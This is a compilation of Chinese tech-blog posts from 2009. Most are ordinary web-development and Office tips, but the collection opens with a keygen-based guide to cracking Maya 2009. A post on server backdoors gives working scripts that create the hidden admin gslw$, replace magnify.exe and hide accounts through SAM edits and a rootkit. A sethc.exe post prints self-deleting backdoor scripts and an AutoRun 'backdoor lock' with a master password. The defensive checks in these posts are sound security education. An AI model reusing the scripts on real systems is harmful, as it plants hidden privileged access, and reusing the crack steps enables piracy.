电脑老窝 - 经验共享

真正的MAYA2009破解方法

sevengo@163.com(小骇) — Sun,07 Jun 2009 11:49:58 +0800

真正的MAYA2009破解方法，我已经成功运行了，具体如下

1.安装MAYA。
2.在c盘建立一个名叫 FLEXLM 的文件夹。 (注意：c盘只是一个例子，你可以在任意一个盘符下建，最好建在你的安装目录下，以后好管理，下面会用到)
3.将aw.dat 和awkeygen.exe 拷贝到 FLEXLM。（这两个文件在iso安装的Crack文件夹里，iso文件winrar就可以打开，右键-解压文件就可以找到）

4.获取网卡物理地址，方法有两个：
[1]按开始菜单选择Autodesk-->common utilities-->FlexLM license utilities，在system setting下的Ethernet address 中显示的就是网卡物理地址
[2]在开始--运行下输入cmd,进入dos模式后输入ipconfig/all敲回车，输出的信息中有一项Physical Address 是一组16进制编码，注意要去掉中间的间隔符。
5.用记事本打开aw.dat
6.将其中的your_host 替换你的物理网卡地址，12位不要敲入“-”“：”等字符。
7.点击运行输入 “C:\FLEXLM\awkeygen.exe aw.dat” （注意：具体地址是你建立的文件地址）
这时会出现一个一闪而过的黑色窗口说明好了。
【注】不要双击awkeygen.exe，将aw.dat拖进注册机里运行。也许有的人可以注册成功，但是一部分人不会成功。
8.选择Autodesk-->AutodeskMaya 2009-->licensing
选择 "I have a license that I need to install 下一步 “I would like to install license from a file"
9. 将其指向AW.DAT。完成。
10.有些朋友可能需要重新启动机器。（先不重启试试）
11.成功，运行你的MAYA吧

如何在html中调用JS文件

sevengo@163.com(小骇) — Sun,10 May 2009 23:01:38 +0800

JavaScript采用的格式如下：

把上述语句放在HTML的与之间，也可放在与之间。
例子：在网页上显示“你好！”。

在浏览器地址栏直接执行JavaScript脚本

也可以在浏览器的地址栏中输入JavaScript语句，由浏览器直接执行。
如输入：javascript:alert(200*75)
调用JavaScript文件

可以将纯JavaScript的语句另外保存在一个"*.js"的文件中，需要时再调用。

例子：调用test.js文件，显示提示。

调用test.js文件

test.js的文件内容如下：
alert("这是被调用的语句。")

统计在线人数方法详解

sevengo@163.com(小骇) — Sun,10 May 2009 22:58:04 +0800

最普通的方法是用SESSION，但缺点是无法即时反应在线情况（有超时时间）和占用服务器资源（如果有100人在线就有100个SESSION，想想看8）；上次（好象间隔很久了耶）介绍了一种采用APPLICATION+COOKIES的方法，但实现方法有些烦琐同时还要设一个隐藏的自刷新页面。
这种方法则避免了以上的弊病，经实践，效果不错），具体如下：
假定INDEX。HTM为框架网页，包含ID=LEFT，ID=TOP和ID=BOTTOM的三个框架
1、做个统计页面USERNUM。ASP

正在统计数据。。。

<%
user=request.querystring("user")
if user=0 then '如果离开则人数-1
application.lock
application("num")=application("num")-1
application.unlock
response.write ""
elseif user=1 then '如果进入则+1
application.lock
application("num")=application("num")+1
application.unlock
end if
%>

2、在框架页面中如（INDEX。HTM）嵌入USERNUM。ASP

......

3、在需要显示人数的页面（假定在LEFT显示）中加入

<%=application("num")%>

4、设定需要更新数据的页面（如BOTTOM）
function tj(){
top.left.num.innerHTML=<%=application("num")%>;
}

完毕，这只是一个例子，具体应用可以灵活，另外，为什么当离开时要WINDOW。OPEN USERNUM。ASP呢？因为如果同样放在IFRME中，窗口关得太快，USERNUM。ASP页面来不及装载就关掉了无法减少人数，不足之处欢迎探讨

Asp下Access无法更新的解决

sevengo@163.com(小骇) — Sun,10 May 2009 22:56:55 +0800

在windows＋iis服务器上运行asp程序可能会出现数据库无法更新的情况，具体错误信息可能为：

1、Microsoft JET Database Engine (0x80040E09) 不能更新。数据库或对象为只读

2、Microsoft OLE DB Provider for ODBC Drivers (0x80004005)[Microsoft][ODBC Microsoft Access Driver] 操作必须使用一个可更新的查询。

3、Microsoft JET Database Engine (0x80004005) 操作必须使用一个可更新的查询。

解决办法有以下几种（针对不同的服务器可能解决办法不一样，在这里假设网站主目录为wwwroot）：

A、在wwwroot文件夹上面点击右键－“属性”－取消“只读”

此方法最简单、偶尔有效

B、在您的数据库文件上文件夹上面点击右键－“属性”－“安全”－添加用户：“IUSR_计算机名” 并开放“IUSR_计算机名”的读取、写入权限

此方法是目前解决这个问题最好的办法，一般都可以解决问题

XP系统下可能点击右键看不到“安全”选项，请先打开“工具”－“文件夹选项”－“查看”－取消“使用简单文件共享（推荐）” 然后即可在属性中找到“安全”选项

C、在wwwroot文件夹上面点击右键－“属性”－“web共享”－“共享文件夹”

以上方法我自己试用了一下，好像作用不大，大家做个参考吧

ASP中使用Session变量的优缺点

sevengo@163.com(小骇) — Sun,10 May 2009 22:55:30 +0800

许多人利用Session变量来开发ASP（Active Server Pages）。这些变量与任何编程语言中通用的变量非常相似，并且具有和通用变量一样的优点和缺陷。任何命令都需要运行时间和存储空间（甚至GOTO’s语句如此），Session变量同样需要自己的运行时间和存储空间。过多地使用Session变量就会导致无法代码冗余，并且使服务器运行成本提高下面是我个人使用Session变量的一些主要观点和心得体会。

优点

　　如果要在诸多Web页间传递一个变量，那么用Session变量要比通过QueryString传递变量可使问题简化。

　　要使WEb站点具有用户化，可以考虑使用Session变量。你的站点的每位访问者都有用户化的经验，基于此，随着LDAP和诸如MS Site Server等的使用，已不必再将所有用户化过程置入Session变量了，而这个用户化是取决于用户喜好的。

　　你可以在任何想要使用的时候直接使用session变量，而不必事先声明它，这种方式接近于在VB中变量的使用。使用完毕后，也不必考虑将其释放，因为它将自动释放。

缺点

　　Session变量和cookies是同一类型的。如果某用户将浏览器设置为不兼容任何cookie，那么该用户就无法使用这个Session变量！

　　当一个用户访问某页面时，每个Session变量的运行环境便自动生成，这些Session变量可在用户离开该页面后仍保留20分钟！（事实上，这些变量一直可保留至“timeout”。“timeout”的时间长短由Web服务器管理员设定。一些站点上的变量仅维持了3分钟，一些则为10分钟，还有一些则保留至默认值20分钟。）所以，如果在Session中置入了较大的对象（如ADO recordsets，connections，等等），那就有麻烦了！随着站点访问量的增大，服务器将会因此而无法正常运行！

　　因为创建Session变量有很大的随意性，可随时调用，不需要开发者做精确地处理，所以，过度使用session变量将会导致代码不可读而且不好维护。

　　虽然“你可以在任何想要使用的时候直接使用session变量，而不必事先声明它，这种方式接近于在VB中变量的使用。使用完毕后，也不必考虑将其释放，因为它将自动释放”。但是，“谁”想到那儿呢？变量的含义是什么？这些都变得不很清晰。

总结

　　使用Session变量既有优点，又有缺点。就我个人的观点，最好少用，但在某些地方使用它们确实能使Web开发大大地简化。是否使用Session变量完全取决于个人的需要，无论使用与否，都要事先考虑其优缺点

如何防服务器后门

sevengo@163.com(小骇) — Tue,24 Mar 2009 15:56:11 +0800

从某种意义上说，服务器被攻击是不可避免的，甚至被控制也情有可原。但绝对不能容忍的是，服务器被植入后门，攻击者如入无人之境，而管理者去浑然不觉。本文将对当前比较流行的后门技术进行解析，知己知彼方能杜绝后门。
　　1、放大镜后门
　　放大镜(magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具，它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具，因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序，从而达到控制服务器的目的。
　　通常情况下，攻击者通过构造的magnify.exe程序创建一个管理员用户，然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)。需要说明的是，这样调用的程序都是system权限，即系统最高权限。不过，以防万一当管理员在运行放大镜程序时发现破绽，攻击者一般通过该构造程序完成所需的操作后，最后会运行真正的放大镜程序，以蒙骗管理员。其利用的方法是：
　　(1).构造批处理脚本　　
@echo off
　　net user gslw$ test168 /add
　　net localgroup administrators gslw$ /add
　　%Windir%\system32\nagnify.exe
　　exit　　将上面的脚本保存为magnify.bat，其作用是创建一个密码为test168的管理员用户gslw$，最后运行改名后的放大镜程序nagnify.exe。(图1)

(2).文件格式转换
　　因为批处理文件magnify.bat的后缀是bat，必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件，当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。
　　打开命令行，进入bat2com、com2exe工具所在的目录，然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com，继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe，这样就把批处理文件转换成和放大镜程序同名的程序文件。(图2)

3).放大镜文件替换
　　下面就需要用构造的magnify.exe替换同名的放大镜程序文件，由于Windows对系统文件的自我保护，因此不能直接替换，不过Windows提供了一个命令replace.exe，通过它我们可以替换系统文件。另外，由于系统文件在%Windir%\system32\dllcache中有备份，为了防止文件替换后又重新还原，所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下，我们可以通过一个批处理即可实现文件的替换。
　　
@echo off
　　copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
　　copy %Windir%\system32\magnify.exe nagnify.exe
　　replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
　　replace.exe %Windir%\magnify.exe %Windir%\system32
　　exit　　上面批处理的功能是，首先将放大镜程序备份为nagnify.exe，然后用同名的构造程序将其替换。(图3)

(4).攻击利用
　　当完成上述操作后，一个放大镜后门就做成了。然后攻击者通过远程桌面连接服务器，在登录界面窗口摁下本地键盘的“Win+U”组合键，选择运行其中的“放大镜”，此刻就在服务器上创建了一个管理员用户gslw$并打开了放大镜工具，然后攻击者就开业通过该帐户登录服务器。当然，攻击者在断开登录前会删除所有与该帐户相关的信息，以防被管理员发现。(图4)

(5).防范措施
　　进入%Windir%\system32\查看magnify.exe的文件图标是否是原来的放大镜的图标，如果不是的话极有可能被植入了放大镜后门。当然，有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。此时我们可以查看magnify.exe文件的大小和修改时间，如果这两样有一项不符就比较怀疑了。我们也可以先运行magnify.exe，然后运行lusrmgr.msc查看是否有可疑的用户。如果确定服务器被放置了放大镜后门，首先要删除该文件，然后恢复正常的放大镜程序。当然，我们也可以做得更彻底一些，用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身，构造一个magnify.exe，通过其警告攻击者或者进行入侵监控和取证。
　　补充：与放大镜后门类似的还有“粘滞键”后门，即按下SHIEF键五次可以启动粘滞键功能，其利用和防范措施与放大镜后门类似，只是将magnify.exe换成了sethc.exe。
　　2、组策略后门
　　相对来说，组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩，也为大家所熟知。其实，在最策略中也可以实现该功能，不仅如此它还可以实现在系统关机时进行某些操作。这就是通过最策略的“脚本(启动/关机)”项来说实现。具体位置在“计算机配置→Windows设置”项下。因为其极具隐蔽性，因此常常被攻击者利用来做服务器后门。
　　攻击者获得了服务器的控制权就可以通过这个后门实施对对主机的长期控制。它可以通过这个后门运行某些程序或者脚本，最简单的比如创建一个管理员用户，他可以这样做：
　　(1).创建脚本
　　创建一个批处理文件add.bat，add.bat的内容是：@echo off & net user gslw$ test168 /add && netlocalgroup administrators gslw$ /add & exit (创建一个用户名为gslw$密码为test168的管理员用户)。
　　(2).后门利用
　　在“运行”对话框中输入gpedit.msc，定位到“计算机配置一>Windows设置一>脚本(启动/关机)”, 双击右边窗口的“关机”，在其中添加add.bat。就是说当系统关机时创建gslw$用户。对于一般的用户是根本不知道在系统中有一个隐藏用户，就是他看见并且删除了该帐户，当系统关机时又会创建该帐户。所以说，如果用户不知道组策略中的这个地方那他一定会感到莫名其妙。
　　其实，对于组策略中的这个“后门”还有很多利用法，攻击者通过它来运行脚本或者程序，嗅探管理员密码等等。当他们获取了管理员的密码后，就不用在系统中创建帐户了，直接利用管理员帐户远程登录系统。因此它也是“双刃剑”，希望大家重视这个地方。当你为服务器被攻击而莫名其妙时，说不定攻击者就是通过它实现的。(图5)

(3).后门防范
　　组策略后门是攻击者利用了管理员的疏忽心理，因为对于组策略中的“(启动/关机)脚本”项往往被大家忽略，有些管理员甚至不知道组策略中的这个选项。防范这类服务器后门，也非常简单，只需打开组策略工具，定位到“脚本(启动/关机)”项下进行查看。当然也可以进入
　　system32\GroupPolicy\Machine\Scripts\Startup和system32\GroupPolicy\Machine\Scripts\Shutdown目录检查是否有可疑的脚本。(图6)

　　3、RootKit后门
　　Rootkit是一个或者多个用于隐藏、控制系统的工具包，该技术被越来越多地应用于一些恶意软件中，当然攻击者也往往通过它来制作服务器后门。下面结合实例解析其利用方法。
　　(1).创建一般帐户
　　在命令提示符(cmd.exe)下输入如下命令：net user gslw$ test168 /add
　　通过上面的命令建立了一个用户名为gslw$，密码为test168的普通用户。为了达到初步的隐藏我们在用户名的后面加了“$”号，这样在命令提示符下通过net user是看不到该用户的，当然在“本地用户和组”及其注册表的“SAM”项下还可以看到。
　　(2).帐户非常规提权
　　下面我们通过注册表对gslw$帐户进行提权，使其成为一个比较隐蔽(在命令行和“本地用户和组”中看不到)的管理员用户。
　　第一步：打开注册表编辑器，定位到HKEY_LOCAL_MACHINE\SAM\SAM项。由于默认情况下管理员组对SAM项是没有操作权限的，因此我们要赋权。右键点击该键值选择“权限”，然后添加“administrators”组，赋予其“完全控制”权限，最后刷新注册表，就能够进入SAM项下的相关键值了。
　　第二步：定位到注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users项，点击“000001F4”
　　注册表项，双击其右侧的“F”键值，复制其值，然后点击“00000404”注册表项(该项不一定相同)，双击其右侧的“F”键值，用刚才复制键值进行替换其值。(图7)

第三步：分别导出gslw$、00000404注册表项为1.reg和2.reg。在命令行下输入命令"net user gslw$ /del"删除gslw$用户，然后分别双击1.reg和2.reg导入注册表，最后取消administrators对SAM注册表项的访问权限。
　　这样就把gslw$用户提升为管理员，并且该用户非常隐蔽，除了注册表在命令下及“本地用户和组”是看不到的。这样的隐藏的超级管理员用户是入侵者经常使用的，对于一个水平不是很高的管理员这样的用户他是很难发现的。这样的用户他不属于任何组，但却有管理员权限，是可以进行登录的。
　　(3).高级隐藏用户
　　综上所述，我们创建的gslw$用户虽然比较隐蔽，但是通过注册表可以看见。下面我们利用RootKit工具进行高级隐藏，即在注册表中隐藏该用户。
　　可被利用的RootKit工具是非常多的，我们就以Hacker defende危机进行演示，它是个工具包，其中包含了很多工具，我们隐藏注册表键值只需其中的两个文件，hxdef100.exe和hxdef100.ini。其中hxdef100.ini是配置文件，hxdef100.exe是程序文件。打开hxdef100.ini文件定位到[Hidden RegKeys]项下，添加我们要隐藏的注册表键值gslw$和00000404即用户在注册表的项然后保存退出。(图8)

　　然后双击运行hxdef100.exe，可以看到gslw$用户在注册表中的键值“消失”了，同时这两个文件也“不见”了。这样我们就利用RootKit实现了高级管理员用户的彻底隐藏，管理员是无从知晓在系统中存在一个管理员用户的。(图9)

(4).防范措施
　　通过RootKit创建的后门是及其隐蔽的，除非清除RootKit，不然用其创建的管理员用户永远不可能被管理员发现。我们就以清除上面的Hacker defende为例让后门现行。
　　驱动级的扫描：RootKit往往是驱动级别的，因此它比一般的应用程序更加靠近底层，清除起来更加的棘手。清除请进程扫描是必要的，RootKit Hook Analyzer是一款Rookit分析查询工具，利用它可以扫描分析出系统中存在的RooKit程序。该工具是英文程序，安装并运行点击其界面中下方的“Analyze”按钮就可以进行扫描分析，列出系统中的RooKit程序，勾选“Show hooked services only”就可以进行筛选值列出RooKit ervices。当然，类似这样的工具还有很多，我们可以根据自己的需要进行选择。(图10)

　　查看隐藏进程：RootKit的程序进程往往是隐藏性或者嵌入型的，通过Windows的“任务管理器”是无法看到的。我们可以利用一款强大的进程工具IceSword(冰刃)来查看。运行IceSword点击“进程”按钮，就可以列出当前系统中的进程，其中红色显示的是可疑进程。我们可以看到hxdef100.exe进程赫然其中，这真是我们刚才运行的RootKit。在该进程上点击右键选择“结束”进程。这时hxdef100.exe和hxdef100.ini文件显身了，再刷新并查看注册表，刚才消失的两个键值有重现了。(图11)

专业工具查杀：利用IceSword进行RooKit的分析和并结束其进程不失为反RooKit的一种方法，但有的时候冰刃并不能分析出RootKit，因此我们就要比较专业的工具。比如卡巴斯基、超级巡警等都是不错的选择。下图就是通过超级巡警检测到的RootKit病毒。(图12)

　　4、telnet后门
　　telnet是命令行下的远程登录工具，不过在服务器管理时使用不多也常为管理员所忽视。攻击者如果在控制一台服务器后，开启“远程桌面”进行远程控制非常容易被管理员察觉，但是启动Telnet进行远程控制却不容易被察觉。不过，telnet的默认端口是23，如果开启后，别人是很容易扫描到的，因此攻击者会更改telnet的端口，从而独享该服务器的控制权。
　　(1).修改端口
　　本地修改Windows 2003服务器的telnet端口的方法是:“开始→运行”输入cmd打开命令提示符，然后运行命令“tlntadmn config port=800”(800是修改后的telnet端口，为了避免端口冲突不用设置成已知服务的端口。) 当然，我们也可以远程修改服务器的telnet端口，在命令提示符下输入命令“tlntadmn config \\192.168.1.9 port=800 -u gslw -p test168 ”(\\192.168.1.9对方IP，port=800要修改为的telnet端口，-u指定对方的用户名，-p指定对方用户的密码。)(图13)

　　(2).远程登录
　　攻击者在本地运行命令提示符(cmd.exe)输入命令“telnet 192.168.1.9 800”然后输入用户名及其密码记录telnet到服务器。
　　(3).防范措施
　　对于telnet后门的方法非常简单，可以通过“tlntadmn config port=n”命令更改其端口，更彻底的运行“services.msc”打开服务管理器，禁用telnet服务。(图14)

　5、嗅探后门
　　这类后门是攻击者在控制了服务器之后，并不创建新的帐户而是在服务器上安装嗅探工具窃取管理员的密码。由于此类后门，并不创建新的帐户而是通过嗅探获取的管理员密码登录系统，因此隐蔽性极高，如果管理员安全意识不高并缺少足够的安全技能的话是根本发现不了的。
　　(1).安装嗅探工具
　　攻击者将相应的嗅探工具上传或者下载到服务器，然后安装即可。需要说明的是这些嗅探工具一般体积很小并且功能单一，但是往往被做成驱动形式的，所以隐蔽性极高，很难发现也不宜清除。
　　(2).获取管理员密码
　　嗅探工具对系统进行实施监控，当管理员登录服务器时其密码也就被窃取，然后嗅探工具会将管理员密码保存到一个txt文件中。当攻击者下一次登录服务器后，就可以打开该txt文件获取管理员密码。此后他登录服务器就再不用重新创建帐户而是直接用合法的管理员帐户登录服务器。如果服务器是一个Web，攻击者就会将该txt文件放置到某个web目录下，然后在本地就可以浏览查看该文件了。(图15)

　　(3).防范措施
　　嗅探后门攻击者以正常的管理员帐户登录服务器，因此很难发现，不过任何入侵都会留下蛛丝马迹，我们可以启用组策略中的“审核策略”使其对用户的登录情况进行记录，然后通过事件查看器查看是否有可疑时间的非法登录。不过，一个高明的攻击者他们会删除或者修改系统日志，因此最彻底的措施是清除安装在服务器上的嗅探工具，然后更改管理员密码。
　　总结：上面我们比较详细地解析了五种服务器后门技术，并提供了防范措施。要从根本上防范后门，管理员做好服务器的安全部署，及时地进行系统更新不给攻击者留后门的机会。当然，就算服务器被安置了后门，也不管其采用了多么高明的技术，只要时刻提高警惕掌握一定的安全技能就能够使后门现行

对sethc.exe后门的解决办法~

sevengo@163.com(小骇) — Thu,19 Mar 2009 17:15:45 +0800

打开你的windows2003服务器3389远程管理客户端，然后连续按5下shift键。看看有什么东西！直接调用的粘置窗口的程序sethc.exe，很多黑客会CMD.exe文件来替换此文件的方式给自己留后门，一般该文件都具有users组的权限，现在的IDC在机器原始配置的时候都很少注意权限分配，再加上一些管理员对这些很陌生，所以很多人忽视了这个地方。

解决办法：
打开你的system32目录，寻找sethc.exe文件，默认情况，管理员是不能编辑此文件的，因为默认权限是继承不允许的。所以，在改文件上打开右键，选择“属性”，选择“安全”选项卡，再点击“高级”按钮，把“从父项继承……”前面的对勾去掉，然后确定一下。接下来有两种方式：一是删除所有组的权限，就是大家都用不了该文件，另一种是添加一个everyone组，然后设置该组的所有权限都是“拒绝”，效果是一样的，反正就是大家都玩不了。
还有另外一个位置/%systemroot%/system32/dllcache目录下，也使用同样的方法设置sethc.exe.

这样你的服务器就至少在这个文件生出现什么问题了。

下面给三段非常BT的sethc.exe后门代码,只做研究啊
Dim obj, success
Set obj = CreateObject(”WScript.Shell”)
success = obj.run(”cmd /c takeown /f %SystemRoot%\system32\sethc.exe”, 0, True)
success = obj.run(”cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F”, 0, True)
success = obj.run(”cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe”, 0, True)
success = obj.run(”cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe”, 0, True)
success = obj.run(”cmd /c del %SystemRoot%\system32\sethc.exe”, 0, True)
success = obj.run(”cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe”, 0, True)

自动应答，自动删除
On Error Resume Next
Dim obj, success
Set obj = CreateObject(”WScript.Shell”)
success = obj.run(”cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe”, 0, True)
CreateObject(”Scripting.FileSystemObject”).DeleteFile(WScript.ScriptName)

为了后门的不让大家都进去玩，所以加个后门锁的功能：
allyesno注：可以采用cmd 锁来进行cmdshell的密码验证（关于什么是cmd锁，混混将在以后的文章中给大家提出）
用下面的后门锁的方法是把代码保存为bdlock.bat
然后修改注册表位置即可
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
“AutoRun”=”bdlock.bat”
@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if “%check%”==”%temprandom%%temprandom%” goto passcheck
if “%check%”==”%temprandom%” (
rem 后门服务器验证
rem 如果没有后门验证服务器请rem注释掉下一行代码
if exist \192.168.8.8\backdoor$\pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If “%passcmdlock%”==”http://blog.csdn.net/freexploit/” Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码？
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if “%password%”==”allyesno is a sb” goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr “^password=%timechange%%time:~1,1%%date:~8,2%%sum%$”>nul
If “%errorlevel%”==”0″ cls&Echo 口令正确&Goto End
Echo 请联系客服咨询正确密码！&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo
:endx

网站开发流程及各岗位职责

sevengo@163.com(小骇) — Wed,25 Feb 2009 11:53:43 +0800

如何修复WORD文档

sevengo@163.com(小骇) — Tue,03 Feb 2009 17:36:15 +0800

一、文档格式法

这种方法是将损坏的Word文档转换为另一种格式，然后再将它转换回Word文档格式。这是最简单和最彻底的文档恢复方法。所以如果遇到显示混乱的情况，推荐首先使用这种方法。步骤如下：

1.在Word中打开损坏的文档，选择“文件→另存为”，在“保存类型”列表中，选择“RTF格式（.rtf）”，然后单击“保存”按钮。

2.关闭损坏的文档，打开刚才保存的RTF文件，选择“文件→另存为”，在“保存类型”列表中，选择“Word文档（.doc）”，然后单击“保存”按钮。

3.关闭RTF文档，打开DOC文档。

Word文档与RTF的相互转换将保留其格式，如果这种转换没有修复文件，则可以尝试与其他格式相互转换，这将不同程度地保留Word文档的格式。如果使用这些格式均无法解决本问题，可将文档转换为纯文本格式（.txt），再转换回Word格式。由于纯文本的简单性，有可能修复损坏处，但是Word文档的所有格式设置都将丢失。

二、重设格式法

Word用文档中的最后一个段落标记关联各种格式设置信息，特别是节与样式的格式设置信息。这样，如果我们将最后一个段落标记之外的所有内容复制到新文档，就有可能将损坏的内容留在原始文档中。步骤如下：

1.在Word中打开损坏的文档，选择“工具→选项”，然后选择“编辑”选项卡，取消“使用智能段落选择范围”复选框前的钩。这样，选定整个段落时，Word将不会自动选定段落标记。然后单击“确定”按钮。

2.选定最后一个段落标记之外的所有内容，方法是：按“Ctrl+End”组合键，然后按“Ctrl+Shift+Home”组合键。

3.在常用工具栏中，依次单击“复制”、“新建”和“粘贴”按钮。

三、重建模板法

Word在“Normal.dot”模板文件中存储默认信息，如果该文件被损坏，Word文档也有可能出问题。创建新的Normal模板的步骤如下：

1.关闭已打开的Word程序。

2.选择“开始→查找→文件或文件夹”，在“名称”框中，键入“Normal.dot”，在“搜索”下拉列表中选择安装Word的分区，然后单击“开始查找”按钮。

3.右键单击搜索结果列表中的“Normal.dot”，然后选择菜单中的“重命名”，随便输入一个新的名称，然后“确定”。

4.启动Word程序。

由于Word无法识别重命名后的“Normal.dot”文件，Word只能重新创建一个新的Normal模板。创建新的Normal模板后，可以尝试打开损坏的文档。如果问题解决了，那就表明旧的Normal模板确实已经损坏。此外，如果你的文档还用到了“Normal.dot”之外的其他模板，为解决问题，也请尝试重新创建该模板或使用它的较早版本。

Dreamweaver使用技巧集锦

sevengo@163.com(小骇) — Sun,01 Feb 2009 14:50:05 +0800

1、在Dreamweaver 3中输入空格

1)可以用中文的全角状态下按空格键，强烈推荐
2)插入一个透明的图
3)用pre标签里写你的内容
4)object　里的invisiables 里的　none-breaking space 点一下
5)instert 菜单下的　none-breaking space
6)CTRL+SHIFT+空格键加入
7)CTRL+T 去掉尖括号，键入　；
（注后面四个是的实质都是一样的）

2、实现浏览器状态栏中的滚动字幕

　　按下F8键，在Behaviors窗口中选取Behaviors，单击“＋”号，再选取“Set Text→Set Text of Status Bar”，最后在弹出的对话框中写上你想在状态栏出现的文字就可以了。

3、制作鼠标移动上去会有变化的动态链接图像

　　首先准备两幅图，第一幅是原始图像，另一幅是鼠标移动上去后的图像。用鼠标单击第一幅图，在属性面板中的链接栏中填上要链接的文件，然后按F8，在Behaviors窗口中点击“＋”号，选择“Swap Image”，在出现的窗口中选择第二幅图，点击确定，就成功了。

4、将 Dreamweaver 集成到 IE 浏览器

　　Dreamweaver 安装程序会在上下文选单增加一个“Edit with Dreamweaver”命令。还可以修改 Windows 的注册表，就象 MS Word 、Frontpage 和 Notepad 一样，通过 IE 工具栏的编辑按钮来调用 Dreamweaver 打开当前网页。
　　将下面文本的最后一行要改为你自己的 Dreamweaver 安装路径，把它们保存为一个 *.reg 文件，双击它将信息添加到注册表即可。

REGEDIT4
[HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver]
[HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver\shell]
[HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver\shell\edit]
[HKEY_CLASSES_ROOT\.htm\OpenWithList\Dreamweaver\shell\edit\command]
@="\"D:\\Macromedia\\Dreamweaver 3\\dreamweaver.exe\" \"%1\""

　　如果要设置为 IE 缺省的编辑器，打开 IE 的“Internet 选项”，在程序标签指定。

5、如何避免点击空链接的对象时会跳到页面的顶端的现象

　　浏览器以为链接到同一页，可它又找不到定义的书签（anchor），于是停留在页面的顶端。用“javascript:void(null)”替换空链接的“#”，解决这个问题。

6、如何解决使用 CSS 、层时，在不同浏览器的效果不一样，有时甚至出现错位的现象

　　不要混合使用层和表格排版(如果是父子关系，如层中表格，不在此原则范围内)
　　内联式的 CSS 在 Netscape Navigator 中经常会出现问题，使用链式或内嵌式；
　　有时需要在空层插入表格或者透明图片，以保证在 Netscape Navigator 里的效果。对于只有几个像素宽度或高度的层，改用图片来实现；
　　避免使用 W3C 组织不推荐的排版属性，用 CSS 代替。

7、如何在网页中加入注释

　　代码：< !-- 这是注释 -->

8、如何在网页中加入EMAIL链接并显示预定的主题

　　代码：< a href=“mailto:yourmail@xxx.xxx?Subject=你好”>Send Mail< /a>

9、如何制作电子邮件表单

　　在